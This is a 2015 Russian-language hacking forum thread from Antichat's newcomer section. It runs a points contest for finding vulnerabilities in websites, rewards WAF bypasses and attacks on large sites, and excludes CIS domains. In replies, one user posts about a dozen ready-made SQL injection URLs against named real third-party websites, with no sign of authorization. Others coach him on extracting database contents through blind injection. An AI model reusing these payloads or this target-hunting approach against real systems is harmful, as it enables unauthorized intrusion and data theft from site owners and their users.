Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Песочница (https://forum.antichat.xyz/forumdisplay.php?f=189)
-   -   Конкурс уязвимостей для новичков (https://forum.antichat.xyz/showthread.php?t=426171)

faza02 01.06.2015 18:55

Правила:

Ваша задача найти уязвимости в веб-приложениях.

Каждая уязявимость оценивается в определенное количество баллов и после достижения отметки 20 вы получаете награду в виде репутации (достаточной, чтобы больше не писать в "Песочнице" ).

Также, действует система бонусов. Если вы приложите уязвимый код к найденной уязвимости, получаете еще 5 баллов. Обход WAF, нестандартность и уязвимости на крупных ресурсах будут также поощряться.

За плагиат баллы вычитаются, поэтому проверяйте найденные уязвимости в Google (не только на форуме Античат, но вообще по всему поисковику). Запрещено постить уязвимости на сайтах стран СНГ (ru, by, ua).

В посте необходимо указать тип уязвимости, требования и эксплоит (именно в таком формате), например:

Цитата:

Сообщение от None
Сайт: example.com
Уязвимость: SQL Injection
Эксплоит:
Код:

Code:
http://example.com/index.php?id=1 UNION SELECT 1,2,3,table_name FROM information_schema.tables

Код уязвимости:
Код:

Code:
$query = "SELECT news FROM cds WHERE id=".$_GET['id'];


Уязвимости:
  • SQL Injection (2 балла)
  • Stored XSS (2 балла)
  • Reflected XSS (1 балл)
  • Local File Inclusion (3 балла)
  • Remote File Inclusion (4 балла)
  • Remote Code Execution (5 баллов)
  • XXE (5 баллов)
  • Arbitary File Read (3 балла)

Для наглядности баллы будут в ручном режиме добавляться в таблицу: https://yarbabin.ru/antichat/

Типы уязвимостей:
  • Оранжевые (с приложенным исходным кодом уязвимости)
  • Серые (эксплоит без кода)

dmn75 04.06.2015 16:51

Буду первым. Если что не так подправьте

Site: dkcity.com

Уязвимость: SQL Injection

Эксплоит:

Код:

Code:
http://www.dkcity.com/products.php?uID=999999.9 union all select [t],2,3,4,5,6,7,8,9,10,11,12&cID=&keyword=&page=5

Site: knitty.com

Уязвимость: SQL Injection

Эксплоит:

Код:

Code:
http://www.knitty.com/banner.php?id=1641' and [t] and '1'='1&url=http://www.stringtheoryyarn.com/home.php?xid=1fd829ff61f9611a535fa8370f36caa7


faza02 04.06.2015 17:27

Цитата:

Сообщение от dmn75
dmn75 said:

Буду первым. Если что не так подправьте
Site: dkcity.com
Уязвимость: SQL Injection
Эксплоит:
Код:

Code:
http://www.dkcity.com/products.php?uID=999999.9 union all select [t],2,3,4,5,6,7,8,9,10,11,12&cID=&keyword=&page=5

Site: knitty.com
Уязвимость: SQL Injection
Эксплоит:
Код:

Code:
http://www.knitty.com/banner.php?id=1641' and [t] and '1'='1&url=http://www.stringtheoryyarn.com/home.php?xid=1fd829ff61f9611a535fa8370f36caa7


тулзой крутите? для blind тоже нужен запрос на вывод чего-нибудь. если сможете сделать вывод через еррор-басед, получите больше очков, как за крупный сайт. и, по возможности, пишите в один пост. в таблицу добавил.

P. S. активнее, ребят

BabaDook 04.06.2015 17:48

А я не понял, а где уязвимый код ? В этом-то вся сложность.(Для меня )

faza02 04.06.2015 17:50

Цитата:

Сообщение от BabaDook
BabaDook said:

А я не понял, а где уязвимый код ? В этом-то вся сложность.(Для меня )

Цитата:

Сообщение от yarbabin
yarbabin said:

Если вы приложите уязвимый код к найденной уязвимости, получаете еще 5 баллов

исходники с уязвимостью прибавляют баллы, но можно и без них

dmn75 04.06.2015 18:30

Да, тулзой кручу.

Сайт: theatreinchicago.com

Уязвимость: SQL Injection

Эксплоит:

Код:

Code:
http://www.theatreinchicago.com/news.php?articleID=999999.9 union all select 1,[t],3,4,5,6,7,8

Сайт: tsgconsumer.com

Уязвимость: SQL Injection

Эксплоит:

Код:

Code:
http://www.tsgconsumer.com/news/article/index.php?id=7999999.9' union all select 1,2,3,[t],5,6,7,8,9,10,11,12,13,14,15 and '0'='0

Сайт: alicekwartler.com

Уязвимость: SQL Injection

Эксплоит:

Код:

Code:
http://alicekwartler.com/product-list.php?id=999999.9 union all select 1,[t]

Сайт: athenscine.com

Уязвимость: SQL Injection

Эксплоит:

Код:

Code:
http://athenscine.com/showing/details.php?id=999999.9 union all select 1,2,3,4,5,6,7,[t],9,10,11,12,13,14,15,16,17,18,19,20

Сайт: classifieds.chiangmaicitylife.com

Уязвимость: SQL Injection

Эксплоит:

Код:

Code:
http://classifieds.chiangmaicitylife.com/indepth/details.php?id=1261 or 1=[t] and 1=1

Сайт: cstv.collegesports.com

Уязвимость: SQL Injection

Эксплоит:

Код:

Code:
http://cstv.collegesports.com/ncaa_bkup/default.php?id=999999.9 union all select 1,2,[t],4,5

Сайт: ctnrecruiting.com

Уязвимость: SQL Injection

Эксплоит:

Код:

Code:
http://ctnrecruiting.com/event_details.php?id=999999.9 union all select 1,[t],3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19

Сайт: diarionecochea.com

Уязвимость: SQL Injection

Эксплоит:

Код:

Code:
http://diarionecochea.com/videos/view.php?id=999999.9' union all select 1,[t],3,4,5,6,7,8 and '0'='0&titulo=TN en vivo

Сайт: dogarchive.kennel-apbt.com

Уязвимость: SQL Injection

Эксплоит:

Код:

Code:
http://dogarchive.kennel-apbt.com/details.php?id=150874' and [t] and '1'='1

Сайт: eu.bosscom.com

Уязвимость: SQL Injection

Эксплоит:

Код:

Code:
http://eu.bosscom.com/product.asp?id=[t]

Какой именно запрос на вывод нужен?

faza02 04.06.2015 18:34

Цитата:

Сообщение от dmn75
dmn75 said:

Какой именно запрос на вывод нужен?

если blind, то хотя бы substring версии

BigBear 04.06.2015 18:36

Цитата:

Сообщение от yarbabin
yarbabin said:

если blind, то хотя бы substring версии

substring не интересен. Давайте left(), right(), или mid() хотя бы. Что уж совсем простое.

faza02 04.06.2015 18:52

Цитата:

Сообщение от BigBear
BigBear said:

substring не интересен. Давайте left(), right(), или mid() хотя бы. Что уж совсем простое.

а разница?

BigBear 04.06.2015 18:56

Цитата:

Сообщение от yarbabin
yarbabin said:

а разница?

Для развеивания шаблонного мышления.


Время: 19:19